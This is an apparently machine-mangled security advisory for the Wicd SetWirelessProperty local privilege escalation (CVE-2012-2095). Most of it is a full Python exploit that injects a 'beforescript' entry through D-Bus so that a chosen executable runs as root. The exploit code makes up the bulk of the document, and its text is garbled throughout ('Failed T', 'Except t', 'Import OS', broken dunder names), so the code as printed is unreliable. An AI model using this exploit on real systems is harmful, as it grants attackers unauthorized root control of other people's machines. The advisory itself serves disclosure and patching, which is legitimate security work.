Wicd 'setwirelessproperty () 'Local Privilege Escalation Vulnerability

Release date:
Updated on:

Affected Systems:
Wicd 1.7.1 ~ B3-4
Wicd 1.7.1 ~ B3-3
Wicd 1.5.9
Wicd 1.5.8
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52987
Cve id: CVE-2012-2095

Wicd is an open-source wired and wireless network manager for Linux.

Wicd has a local privilege escalation vulnerability in the input verification of the 'setwirelessproperty () 'function. Attackers can access the allow interface to execute arbitrary code using the superuser privilege.

<* Source: anonymous
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Anonymous () provides the following test methods:

#! /Usr/bin/python
# Wicd 0day exploit discovered on 4.9.12 by InfoSec Institute student
# For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
Import sys
Import OS
Import time
Import getopt

Try: from wicd import dbusmanager
Failed T: print "[!] WICD Error: libraries are not available. Is WICD installed? "; Sys. exit (0)

Class Error (Exception ):
Def _ init _ (self, error ):
Self. errorStr = error

Def _ str _ (self ):
Return repr (self. errorStr)

Class Wicd ():
Wireless = None
Daemon = None
VersionString = None
Def _ init _ (self ):
Try:
Dbusmanager. connect_to_manager ()
DbusInterfaces = dbusmanager. get_dbus_ifaces ()
Self. wireless = dbusInterfaces ["wireless"]
Self. daemon = dbusInterfaces ["daemon"]
Except t:
Raise Error ("Daemon is not running ")
Self. versionString = self. daemon. Hello ()

Def versionLessThan (self, version ):
If int (self. versionString. replace (".", "") <= version:
Return True
Else:
Return False

Class Exploit ():

Def _ init _ (self, wicd, scriptPath ):
Self. wicd = wicd
Self. scriptPath = scriptPath

Def getNets (self ):
Self. wicd. wireless. Scan (True)
Nets = self. wicd. wireless. GetNumberOfNetworks ()
While nets <1:
Self. wicd. wireless. Scan (True)
Nets = self. wicd. wireless. GetNumberOfNetworks ()
For net in range (nets ):
Yield net

Def exploit (self ):

For net in self. getNets (): pass # Priming scan.

Try:
Self. wicd. wireless. SetWirelessProperty (0, "beforescript =" + self. scriptPath + "\ nrooted", "true ")
Except t:
Raise Error ("Unable to exploit (SetWirelessProperty () failed .)")

Try:
Self. wicd. wireless. SaveWirelessNetworkProperty (0, "beforescript =" + self. scriptPath + "\ nrooted ")
Except t:
Raise Error ("Unable to exploit (SetWirelessProperty () failed .)")

PropertyKey = 'bssid' # cocould be essid, or any other identifiable wireless property
VulnIdentifier = self. wicd. wireless. GetWirelessProperty (0, propertyKey)

# TODO: Does this need a try construct?
Self. wicd. wireless. ReloadConfig ()

For net in self. getNets (): # Implicit, but required re-scan.
If self. wicd. wireless. GetWirelessProperty (net, propertyKey) = vulnIdentifier:
Self. wicd. wireless. ConnectWireless (net)
Return True
Raise Error ("Unable to exploit (Lost the network we were using )")

Def usage ():
Print "[!] Usage :"
Print "(-h, -- help ):"
Print "Print this message ."
Print "(-- scriptPath =): Required, executable to run as root ."
Print "-- scriptPath =/some/path/to/executable. sh"

Def main ():
Print "[$] WICD = <1.7.0Day"
Try:
Opts, args = getopt. getopt (sys. argv [1:], "h", ["help", "scriptPath ="])
Counter t getopt. GetoptError, err:
# Print help information and exit:
Print '[!] Parameter error: '+ str (err) # Will print something like "option-a not recognized"
Usage ()
Sys. exit (0)

ScriptPath = None

For opt, arg in opts:
If opt in ("-h", "-- help "):
Usage ()
Sys. exit (0)
Elif opt = "-- scriptPath ":
ScriptPath = arg
Else:
# I wocould be assuming to say we'll never get here.
Print "[!] Parameter error ."
Usage ()
Sys. exit (0)

If not scriptPath:
Print "[!] Parameter error: scriptPath not set ."
Usage ()
Sys. exit (0)

Try:
Wicd = Wicd ()
Failed T Error as error:
Print "[!] WICD Error: % s "% (error. errorStr)
Exit (0)
Print "[*] WICD Connection Initialized! (Version: % s) "% (wicd. versionString)

If not wicd. versionLessThan (171 ):
Print "[!] WICD Warning: version print exceeds 1.7.1: Trying anyhow ."

Exploit = Exploit (wicd, scriptPath)

Print "[*] Attempting to exploit :"

Try:
Exploit. exploit ()
Failed T Error as error:
Print "[!] Exploit Error: % s "% (error. errorStr)
Exit (0)
Print "[*] Exploit appears to have worked ."

# Standard boilerplate to call the main () function to begin
# The program.
If _ name __= = '_ main __':
Main ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Wicd
----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://wicd.net/